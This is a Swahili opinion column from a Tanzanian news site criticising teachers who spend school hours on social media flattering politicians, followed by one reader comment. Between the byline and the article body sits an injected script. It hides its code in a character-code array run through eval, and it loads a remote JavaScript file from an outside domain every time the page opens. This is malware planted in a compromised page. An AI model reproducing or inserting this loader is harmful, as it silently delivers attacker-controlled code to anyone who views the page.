Recent Comments

WALIMU WANAOSHINDA MITANDAONI NI KICHEFUCHEFU

By Baraka Bitariho Nov 18, 2022
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Na, Mwandishi wetu
Assalamu alaikum rahmatullahi wa barakatuh. Bila shaka hamjambo wapenzi wasomaji wa habari kupitia tovuti yetu pendwa ya www.simamia.com na wafuatiliaji wa habari kupitia Luninga makini ya mtandao Simamia TV.

Ni Ukweli usiopingika kuwa Teknolojia ya Habari na mawasiliano TEHAMA ni kichocheo cha Maendeleo kwa jamii hasa Nchini kwetu Tanzania tofauti na zamani ambapo ilionekana kuwa Anasa kwa namna moja ama nyingine hasa matumizi ya Vifaa vya umeme kama vile Komputa mpakato (Laptop),Tablet(Vishikwambi) na Simu janja maarufu kama Smartphones.

Kwa sasa vifaa hivyo vimekuwa sehemu ya maisha ya kawaida na zana za kazi za kila siku kwakuwa vinarahisisha sana utendaji wa shughuli mbalimbali iwe Ofisini,au majumbani.

Anasa inakuja katika Matumizi yake hasa vinapotumika vibaya mathalani kutafuta habari za kuumiza upande mmoja au kuchochea upande mwingine kwa maslahi binafsi au kusifia jambo linalokanmdamiza uhuru na faragha za mtu,kundi au jamii.

Hivi Karibuni kumeibuka kundi la watumishi wa Serikali hasa walimu ambao badala ya kukaa Darasani na kutekeleza majukumu yao ya kufundisha Wanafunzi kama kama ajira waliyoomba na kupatiwa wao wamejigeuza kuwa visemeo vya wanasiasa.

Kundi hilo sasa linaitwa CHAWA. Hii imekuwa kero tena kichefuchefu. Hili suala linatakiwa kuangaliwa kwa jicho pana na umakini zaidi ili kuliepusha taifa kudumbukia katika wimbi la Ujinga uliopitiliza kwasababu Wanafunzi hawapati huduma inavyotakiwa.

*Fikiria, Mwalimu anayetakiwa kuwa darasani asubuhi kwaajili ya Vipindi vya asubuhi kuanzia saa 12 alfajiri yeye yupo mitandaoni kujibu hoja zinazotakiwa kujibiwa na Diwani au Mbunge kwakuwa tu yuko karibu naye!

*Mwalimu huyo huyo, anajivisha majukumu ya kushambulia watu wenye mawazo chanya kwa masilahi ya umma kwaniaba ya Mtu Fulani ambaye anaamini kwakufanya hivyo anamfurahisha bosi wake!

*Najiuliza, mwalimu wa namna hiyo atapata nafasi saa ngapi ya kukaa darasani na kuwafundisha watoto kama siyo kuandaa Taifa Jinga na Masikini?

*Waratibu Elimu Kata, wapo na wanafahamu majukumu yao. Kwanini hawawajibishi walimu wa namna hiyo?

*Enyi Madiwani na Wabunge wapenda Sifa, mnatambua kuwatumia walimu wetu kuwa mnashiriki kuliharibu Taifa letu pendwa Tanzania?

Kwakifupi, walimu wa namna hiyo mnajijua na mnajiaibisha. Maadili ya ualimu hayako hivyo.

Mnaaibisha taaluma zenu,au labda mtueleze kama mliingia kwa bahati nasibu. Haikuwa dhamira yenu kusomea ualimu au mlizawadiwa nafasi hizo. Ikiwa ni dhamira zenu na mnatambua magumu waliyoipitia wazazi wenu kuwalipia Karo vyuoni msingekubali kutumikishwa kama vitambaa vya kupigia deki.
Taifa letu linawathamini sana Walimu. Nasi tunaheshimu sana Walimu.
Rais wa kwanza na Baba wa Taifa letu hayati J.K Nyerere alikuwa Mwalimu. Wapo Viongozi wengi Serikalini hata sasa wameanzia kwenye Ualimu. Waziri Mkuu wetu wa sasa Majaliwa Kassimu Majaliwa ni Mwalimu. Tafadhali msichafue kada hiyo muhimu ambayo imezalisha Viongozi makini.

Wakati nikielekea kuiweka kalamu yangu chini niwaombe sana hasa walimu vijana mnaoshinda mitandaoni kuimba mapambio,sifa na ngonjera za kuwapamba wanasiasa uchwara muache tabia hizo.

Hao mnaowasifia mtambue kuwa mnawaharibia. Waswahili walisema kizuri chajiuza na kibaya chajitembeza. Ikiwa ni mazuri yatajionyesha wazi na mahakimu ni wananchi ambao wanaona uzuri wa wanasiasa hao mnaowapigia debe.

Bahati nzuri sana,Katiba ya JMT pamoja na mabaya yake ambayo wanaharakati na wapenda maendeleo ya taifa letu wanapiga kelele ili ifanyiwe marekebisho imeweka wazi ukomo wa madaraka. Bila hata kupiga kelele,kusifia,kuimba ngonjera na upuuzi wa kupinga bila hoja ilimradi mpate chochote kana kwamba hamlipwi mshahara wananchi wana nafasi ya kuamua kuendelea au kuwapiga chini viongozi wababaishaji baada ya miaka 5 kwenye Uchaguzi.

Zamani tulizoea kuona mtu anayefanya vizuri kuanzia mienendo,matendo na kauli mifano ikitolewa kwa Mwalimu. Lakini sasa kada hiyo imevamiwa na vijana vichefuchefu mnaojipendekeza,kujikombakomba kwa viongozi na kugeuka kuwa CHAWA hii ni aibu.

Wapenda maendeleo na mnaokerwa na huu upuuzi wa vijana hasa watumishi wa Umma wanaoendekeza tabia hizi za ajabu tushirikiane kukemea na kuwarekebisha ili tuwe na Taifa lenye vijana Smart,wenye kutekeleza majukumu yao vizuri na hatimae Wanafunzi Mashuleni wapate haki yao.

Ukitaka kushuhudia haya niliyoeleza,kagua magroup ya WhattsApp hasa yale yanayohusu SIASA. Utashangaa kukutana na kundi kubwa la watu hao ambao sasa wamekuwa kama Mbwamwitu wao ni kubweka tu,kusema hata yasiyowahusu ilimradi tu kuwafurahisha wanasiasa.

Tuandikie maoni yako kuhusu hali hii ili tusaidiane kurekebishana. Sisi Simamia Media tuko wazi. Hapa ni mambo hadharani.Nikimaliza ziara hii ninayoendelea nayo,nitarejea hapa kuweka mifano ya vijana hao hasa hawa walimu wanaotia aibu.

Asante na karibu tena

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com

One thought on “WALIMU WANAOSHINDA MITANDAONI NI KICHEFUCHEFU”
  1. Walimu mchwara kama Deduuoo na Frank’s who ni kushibda mtandaoni wanatukana na kupigia wengine makofi. Idadi ya watoto wanaofauru huko walipopangiwa kazi inawaabisha ila ni zao la kushinda mitandaoni.

Comments are closed.